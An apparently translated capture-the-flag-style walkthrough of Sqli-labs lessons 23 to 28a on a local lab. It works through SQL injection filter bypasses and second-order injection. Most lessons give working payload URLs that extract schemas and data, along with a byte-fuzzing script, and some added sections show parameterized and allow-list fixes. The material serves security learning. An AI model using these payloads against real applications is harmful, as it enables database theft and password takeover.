Learning SQL injection through Sqli-labs--the less23-28a of advanced challenges

Source: Internet
Author: User

This article link: http://blog.csdn.net/u012763794/article/details/51457142


This time I am back with the advanced challenges (Advanced Injections), which are mostly about filter bypasses. Recently I got pulled into reverse engineering (http://www.giantbranch.cn/myblog/?p=27), so this dragged on too long; I finished it today. For the basic challenges see these two articles:


Learning SQL injection through Sqli-labs-the less1-10 of fundamental challenges

http://blog.csdn.net/u012763794/article/details/51207833

Learning SQL injection through Sqli-labs-the less11-22 of fundamental challenges

http://blog.csdn.net/u012763794/article/details/51361152


First of all, we have to work out what is being filtered; only then can we proceed to the next round of operations.


Less-23 GET - Error based - Strip comments (error-based, comments filtered, GET type). First, a single quote: error.


Add %23 (the URL encoding of #). For GET requests # must be URL-encoded; for POST submissions this is not necessary, see the previous two articles.


From this we know the backend PHP replaces # with an empty string, because there is no gap between the two single quotes in the error message.


That doesn't work, so try the -- single-line comment; since -- only works as a comment when followed by a space or some other character, we add a space after it.

Here the error shows only the original statement's LIMIT in front of a single quote. Because we added a space, the quote we injected and the statement's trailing quote are separated by that space; our quote matched the preceding one without error, and only a single quote is quoted in the error. Comparing with Less-1, we know -- is filtered and replaced with an empty string.


Here is the comparison without a space. In Less-1 the error only reaches the trailing single quote, because the quote from id='1' and the trailing quote were separated by --; the leading quotes are matched, so they do not show up in the error.


For Less-23 the judgment is more obvious: there is no gap between the two single quotes, so -- must have been replaced with an empty string.



Looking at the source code confirms it.


To summarize how to judge comment filtering, i.e. which filter produces which error message:

#: add a single quote or double quote etc. followed by #, and look at the error.

--: likewise, add a single or double quote followed by --, with no space after it (-- is only a valid comment when a space or other character follows it, but that is not needed just to determine the filter).


Then the only way to bypass is to close the quotes yourself; the multi-line comment does not do the job either.



Extracting data is then the same as in Less-1.


Less-24 Second degree injections *Real treat* - Stored injections (second-order injection). Landing on it, it is a complete site with registration, login and password change; looking at the root directory there are indeed many files.
After registering and logging in to understand the flow, we audit each file. Starting from index.php, the files that actually interact with the database are login_create.php, login.php and pass_change.php.

login.php (handles login): filters the username and password.


login_create.php (handles new user creation):

```php
$username = mysql_escape_string($_POST['username']);
$pass = mysql_escape_string($_POST['password']);
$re_pass = mysql_escape_string($_POST['re_password']);
```

All three fields are filtered.

In pass_change.php we find the harvest.


When changing the password, the username is taken directly from the session without any filtering, so once my username contains a comment sequence, I can change someone else's password.


So we just create a new, specially crafted user and change the password.

Below is the example for admin (account: admin'-- password: ASDF).


After registering, check whether the database has it.


So the username is stored with the comment intact. We log in and change the password; to make the effect easy to see, I added output of the SQL statement in the PHP.



Look at the database, it's really changed.


Someone may ask: isn't the single quote escaped at registration time?

Yes, our admin'-- becomes admin\'--.

That makes the left and right quotes around admin\'-- match correctly, but what gets stored in the database is a real single quote (the escaping only makes the quote lose its effect here, temporarily; it still represents a single quote).



Of course, a new user named admin'# also works here.
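To make the Less-24 flaw and its fix concrete, here is an added example (my own Python/sqlite3 model, not the lab's PHP): registration stores admin'-- safely, but a password-change step that pastes the session username into the UPDATE ends up changing admin's password, while the parameterized version only touches the attacker's own row. The function names and the users table are assumptions of this example.

```python
import sqlite3

def setup():
    # Constructed in-memory stand-in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")
    return db

def register(db, username, password):
    # Registration binds the value, so the stored username is the literal
    # string admin'-- with its quote intact (what mysql_escape_string gives).
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def change_password_vulnerable(db, session_user, old, new):
    # pass_change.php style: the username from the session is pasted into
    # the SQL unescaped. With admin'-- the rest of the WHERE clause becomes
    # a comment, so admin's row is updated instead of the attacker's own.
    sql = ("UPDATE users SET password='%s' WHERE username='%s' "
           "AND password='%s'") % (new, session_user, old)
    db.execute(sql)

def change_password_fixed(db, session_user, old, new):
    # Hardened form: every value, including the session username, is bound
    # as a parameter, so the stored quote and comment are just characters.
    db.execute("UPDATE users SET password=? WHERE username=? AND password=?",
               (new, session_user, old))

def password_of(db, username):
    row = db.execute("SELECT password FROM users WHERE username=?",
                     (username,)).fetchone()
    return row[0] if row else None

def demo(fixed):
    # Returns (admin's password, attacker's own password) after the change.
    db = setup()
    register(db, "admin'--", "asdf")
    change = change_password_fixed if fixed else change_password_vulnerable
    change(db, "admin'--", "asdf", "pwned")
    return password_of(db, "admin"), password_of(db, "admin'--")

if __name__ == "__main__":
    print("vulnerable:", demo(fixed=False))  # ('pwned', 'asdf')
    print("fixed:     ", demo(fixed=True))   # ('secret', 'pwned')
```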



Less-25 Trick with OR & AND (or and and filtered)
Confirm single-quote string injection: http://localhost/sqli-labs/Less-25/?id=1'
Judge that or is filtered by comparing the error with Less-1: http://localhost/sqli-labs/Less-25/?id=1' or1
Or take a screenshot: the first picture is Less-1, the second is Less-25.


Similarly, judge that and is filtered: http://localhost/sqli-labs/Less-25/?id=1' and1

Analysing the source again: the regex is opened with the i modifier, so changing case is of no use; we can inject using the symbols corresponding to or and and (|| and &&) instead.



&& must be URL-encoded (%26%26) to reach the backend, since a bare & separates GET parameters.



And, of course, the double-write bypass:

http://localhost/sqli-labs/Less-25/?id=1' oorr '1'='1
http://localhost/sqli-labs/Less-25/?id=1' anandd '1'='1

Less-25a Trick with OR & AND Blind (blind, or and and filtered). So how do we judge the filtering of and and or blindly? Just add or / and directly in front, as above.

The code of this lesson is the same as above, but here error output is turned off, so we can only judge from the page.

Less-26 Trick with comments and space (comments and spaces filtered)
Confirm # is filtered: http://localhost/sqli-labs/Less-26/?id=%231
Confirm or is filtered: http://localhost/sqli-labs/Less-26/?id=or1
Confirm the multi-line comment is filtered: http://localhost/sqli-labs/Less-26/?id=/*1
Confirm the single-line comment is filtered: http://localhost/sqli-labs/Less-26/
Confirm the slash is filtered: http://localhost/sqli-labs/Less-26/?id=/1
Confirm the backslash is filtered: http://localhost/sqli-labs/Less-26/?id=1
Confirm the space is filtered (error-based injection works here, so this is easy to judge): http://localhost/sqli-labs/Less-26/?id=1 "

Really tiring. Below we look at the source code; I confirmed it by reading the source, so confirming what is filtered is still rather tiring.


Next, how to get around it, which is the hard part, since this time we extract the complete data. We often bypass a space filter with the multi-line comment /**/, but here it is filtered, so that does not work. Next I tried the wide-byte trick to see whether some byte can replace the space, and it turns out one can. Beyond that there is nothing for it but to write a script and find out (a little pity, but still something).


The script is as follows:

```python
# -*- coding: utf8 -*-
"""
@version:
@author: giantbranch
@file: testsqli.py
@time: 2016/5/29 23:14
"""
import requests


def change_to_hex(num):
    # Turn a byte value into its URL-encoded form, e.g. 9 -> "%09".
    tmp = hex(num).replace("0x", "")
    if len(tmp) < 2:
        tmp = '0' + tmp
    return "%" + tmp


req = requests.Session()
# Try every byte 0x00-0xff in place of the space on both sides of &&;
# if the page still shows the normal row (Dumb), that byte survived the filter.
for i in range(0, 256):
    enc = change_to_hex(i)
    url = "http://localhost/sqli-labs/Less-26/?id=1" + enc + "%26%26" + enc + "'1'='1"
    ret = req.get(url)
    if 'Dumb' in ret.text:
        print("Good, this can use: " + enc)
```

Run results:

I picked %09 first to look at, and found that apart from %a0 nothing else can replace the space, a little sad. In fact we find that apart from %a0 basically everything else is a filtered character, such as %20 (space), %23 (pound), %2a (asterisk), %2d (minus), %2f (slash), %5c (backslash); as for %09-%0d, these are tab, line feed, form feed and so on, which also count as whitespace. From this you can also work out what the program filters in the first place; this is not universal and still needs testing in practice, but roughly speaking you can find out what the program filters.
Then we can use %a0 instead of spaces.

Full payloads:

Confirm the number of columns:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3,4%a0%26%26%a0%271%27=%271
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271

Get the database currently in use:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,database(),3%a0%26%26%a0%271%27=%271

Get the table information:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271

Get the column information:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0anandd%a0table_name='emails'%26%26%a0%271%27=%271

Finally the data, which turned out not to be extractable:
http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,email_id,3%a0from%a0emails%26%26%a0%271%27=%271

Why can the table and column names be extracted but not the data? The error report made me collapse; I put this aside for now and went on to the next lesson. If you know, tell me.

Update 6.1: finally I know how to extract the data; the syntax above was indeed wrong. Here are two:
http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3
http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0where%a0%271%27=%271
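To show why a blacklist of this kind cannot be repaired by extending the list, here is an added example (my own Python, not the lab's code) that models the Less-25/26 preg_replace chain as described in this post, runs it over the bypass inputs from this post, and contrasts it with an allow-list check on the id. The exact filter steps, the sample inputs and all names are assumptions of this example.

```python
import re

# Constructed inputs: the benign id plus the bypasses discussed in this post.
SAMPLES = {
    "benign":               "1",
    "double-write or":      "1' oorr '1'='1",
    "double-write and":     "1' anandd '1'='1",
    "&& instead of and":    "1'&&'1'='1",
    "%a0 instead of space": "1'\xa0||\xa0'1'='1",
}
OPERATOR = re.compile(r"or|and|&&|\|\|", re.I)


def blacklist_filter(value):
    # Model of the lab's preg_replace chain as this post describes it: strip
    # or/and case-insensitively, then comment characters, minus, backslash and
    # ASCII whitespace. Like PCRE \s without /u, the ASCII \s here does not
    # match the byte 0xa0, which is exactly why %a0 survives.
    value = re.sub(r"or", "", value, flags=re.I)
    value = re.sub(r"and", "", value, flags=re.I)
    return re.sub(r"[/*#\-\\\s]", "", value, flags=re.ASCII)


def fixed_point_filter(value):
    # Re-applying the blacklist until the output stops changing defeats the
    # double-write trick, but && and || still pass through untouched.
    while (out := blacklist_filter(value)) != value:
        value = out
    return out


def allow_list_ok(value):
    # The real fix for a numeric id: accept only ASCII digits and then bind the
    # value as a query parameter. intval()-style coercion is not a substitute:
    # as the post shows for Less-26a, "#1" silently becomes 0 instead of failing.
    return value.isascii() and value.isdigit()


def evaluate():
    # Per sample: does an operator survive one blacklist pass, does it survive
    # the fixed-point blacklist, and does the allow-list accept the id at all?
    return {
        label: (bool(OPERATOR.search(blacklist_filter(raw))),
                bool(OPERATOR.search(fixed_point_filter(raw))),
                allow_list_ok(raw))
        for label, raw in SAMPLES.items()
    }


if __name__ == "__main__":
    print(evaluate())
```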



Less-26a GET - Blind based - All your SPACES and COMMENTS belong to us (blind, spaces and comments filtered)
This is similar to the above, but no error is shown, so deciding what is filtered works basically as above, here judged by whether the returned page has data or not.
There is another question: how to tell whether a character was filtered or the value was forced to an integer. One picture tells you.

As you can see, because the first character is not a digit, intval converts the value directly to 0; whereas if # had been filtered, id=#1 would just be the normal id=1.

Less-27 GET - Error based - All your UNION & SELECT belong to us (union and select filtered)
The old routine: judged to be single-quote string type
http://localhost/sqli-labs/Less-27/?id=1'
Also found that spaces are filtered.

The specific judgment is much like 26; for union and select see the checks below, and you can also check whether double-writing or changing case gets through.
http://localhost/sqli-labs/Less-27/?id=select1
http://localhost/sqli-labs/Less-27/?id=union1

Take a look at the filter: multi-line comments, single-line comments, spaces, and union and select in various cases.


Straight to the payloads:

Dump the database:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),(database()),(3)or(1)='1

Tables:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),(group_concat(table_name)),(3)%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271

Columns:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0%26%26%a0table_name='emails'%26%26%a0%271%27=%271

Extract the data:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3



Less-27a GET - Blind based - All your UNION & SELECT belong to us
This is the blind version of Less-27, double-quote string type:
http://localhost/sqli-labs/Less-27a/?id=1"or"1"="1

Here is the blind payload.

Judge the length of the database name; it is really just slightly deformed, the principle is no different from the earlier blind injections.



Less-28 GET - Error based - All your UNION & SELECT belong to us String - Single quote with parenthesis (error-based, single-quote string type wrapped in parentheses, bypassing the filtering of union, select, etc.)
Just look at the code, since it is similar to the lessons above.

That i is the modifier on the pattern being matched: i means ignore case, and \s matches any whitespace character (tab, newline, space and so on), so we can bypass it by putting no ordinary whitespace in the middle.
Let's just use %a0.
Finally, the payload for extracting data:
http://localhost/sqli-labs/Less-28/?id=0%27)%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0where%a0(%271%27=%271

Less-28a GET - Blind based - All your UNION & SELECT belong to us String - Single quote with parenthesis (blind, single-quote string type wrapped in parentheses, bypassing the filtering of union, select, etc.)
The author has commented out the filter at the front, so let's remove the comment marks, otherwise there is no challenge.
This is the last blind one; with the basics covered there is not much more to say.
Since this is the last lesson, here is a concrete payload: dump the database name, first its length, then each character; knowing the length tells you how many times to repeat it.

Length is 8:
http://localhost/sqli-labs/Less-28a/?id=1') and (length(database())>7) and ('1')=('1
http://localhost/sqli-labs/Less-28a/?id=1') and (length(database())>8) and ('1')=('1

The first character is 115, i.e. s:
http://localhost/sqli-labs/Less-28a/?id=1') and (ascii(substr((select%a0database()))>114) and ('1')=('1
http://localhost/sqli-labs/Less-28a/?id=1') and (ascii(substr((select%a0database()))>115) and ('1')=('1


OK, next time we continue with lessons 29-38, keep going!!! And I look forward to some encouragement below to speed up the progress.

